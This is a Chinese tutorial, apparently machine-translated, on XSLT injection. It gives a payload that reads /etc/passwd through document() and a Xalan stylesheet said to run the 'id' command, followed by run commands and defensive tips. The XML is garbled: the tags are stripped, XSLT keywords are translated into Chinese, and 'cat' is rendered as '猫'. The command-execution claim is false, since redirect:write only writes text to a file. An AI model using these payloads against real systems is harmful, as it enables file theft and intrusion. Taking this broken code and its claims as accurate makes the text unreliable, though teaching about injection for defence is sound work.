xslt注入

XSLT注入是一种类似于SQL注入的Web应用程序安全漏洞。此攻击利用应用程序中缺乏正确验证和转义用户输入的情况，将恶意XSLT 代码注入到应用程序中，从而导致未经授权的代码执行和敏感数据的访问。以下是XSLT 注入可能导致的一些安全问题。

任意代码执行：攻击者可以注入并执行任意XSLT 代码，包括XSLT 1.0 和2.0 扩展。如果XSLT 处理器允许执行外部函数或扩展，则攻击者可能会执行系统命令或脚本。

信息泄露：攻击者可以通过XSLT注入访问和读取不可见数据。您可以使用XSLT 函数（例如document() 函数）从服务器读取其他文件并从其他资源检索数据。

拒绝服务(DoS)：恶意XSLT 代码可能包含无限循环或递归，从而耗尽服务器资源并阻止应用程序响应正常请求。

服务器端请求伪造(SSRF)：XSLT 处理器可以通过document() 函数访问外部资源。攻击者可以利用此漏洞访问受限的内部资源或向外部服务器发送请求。

XSLT 注入攻击的具体实现取决于目标系统的配置和所使用的XSLT 处理器功能。出于学习目的，这里是一个简单的XSLT 注入示例，假设目标系统可以使用document() 函数访问外部资源。

假设目标XML 文档是：

根

数据一些数据/数据

/根

恶意XSLT样式表（有效负载）是：

?xml 版本=\’1.0\’ 编码=\’UTF-8\’?

xsl:stylesheet 版本=\’1.0\’ xmlns:xsl=\’http://www.w3.org/1999/XSL/Transform\’

!– 读取文件系统上的敏感文件–

xsl: 模板匹配=\’/\’

xsl: 变量名=\’文件\’ select=\’document(\’file:///etc/passwd\’)\’/

xsl:copy-of select=\’$file\’ /

/xsl: 模板

/xsl: 样式表

解释

xsl: 变量名=\’文件\’ select=\’document(\’file:///etc/passwd\’)\’/:

使用document() 函数读取文件系统上的/etc/passwd 文件（假设目标系统是类Unix 系统）。 xsl:copy-of select=\’$file\’/:

输出加载文件的内容。

实验环境设置

要在受控环境中进行测试和学习，您可以使用以下步骤：

创建XML文档：将上述XML文档的内容保存在input.xml文件中。创建XSLT 样式表：将恶意XSLT 内容存储在Payload.xsl 文件中。执行转换：使用命令行工具（例如xsltproc）或编程语言（例如Python）执行XSLT转换。

xsltproc有效负载.xsl输入.xml

要通过XSLT 注入执行系统命令（例如id 命令），您必须利用XSLT 处理器的扩展。这是因为标准XSLT 1.0和2.0规范不支持直接执行系统命令。但是，某些XSLT 处理器（例如Saxon 和Xalan）支持扩展函数或允许调用外部脚本，这可能导致任意代码执行。

下面是使用Xalan 处理器的示例，展示了如何通过XSLT 注入运行id 命令。

示例XML文档

根

数据一些数据/数据

/根

恶意XSLT样式表

?xml 版本=\’1.0\’ 编码=\’UTF-8\’?

xsl: 样式表版本=\’1.0\’

xmlns:xsl=\’http://www.w3.org/1999/XSL/Transform\’

xmlns:redirect=\’http://xml.apache.org/xalan/redirect\’

!– 使用Xalan 扩展执行系统命令–

xsl: 模板匹配=\’/\’

xsl: 变量名=\’cmd\’ select=\’\’id /tmp/xslt_injection_output.txt\’\’ /

xsl:value-of select=\’redirect:write(\’file:///dev/null\’, $cmd)\’ /

/xsl: 模板

/xsl: 样式表

解释

xmlns:redirect=\’http://xml.apache.org/xalan/redirect\’：声明Xalan 重定向扩展命名空间。 xsl:variable name=\’cmd\’ select=\’\’id /tmp/xslt_injection_output.txt\’\’ /：定义包含要运行的系统命令ID 的变量cmd，并将输出重定向到/tmp/xslt_injection_output.txt 文件。 xsl:value-of select=\’redirect:write(\’file:///dev/null\’, $cmd)\’ /：使用Xalan 的重定向功能执行命令并将结果写入指定文件。

执行转换

在受控环境中，Xalan 处理器用于执行转换。

java org.apache.xalan.xslt.Process -IN input.xml -XSL Payload.xsl -OUT Output.xml

查看结果

运行命令后，您可以在输出文件/tmp/xslt_injection_output.txt中看到结果。

猫/tmp/xslt_injection_output.txt

安全提示

此方法利用了对特定XSLT 处理器的扩展，并且可能需要每个处理器的不同实现。始终在安全且受控的环境中进行测试，切勿对未经授权的系统使用此类攻击。防止XSLT 注入的最佳实践包括验证和清理用户输入、禁用不必要的功能、使用最小权限原则以及选择安全的处理器库。

以上关于#xslt注入的相关内容来源仅供参考。相关信息请参见官方公告。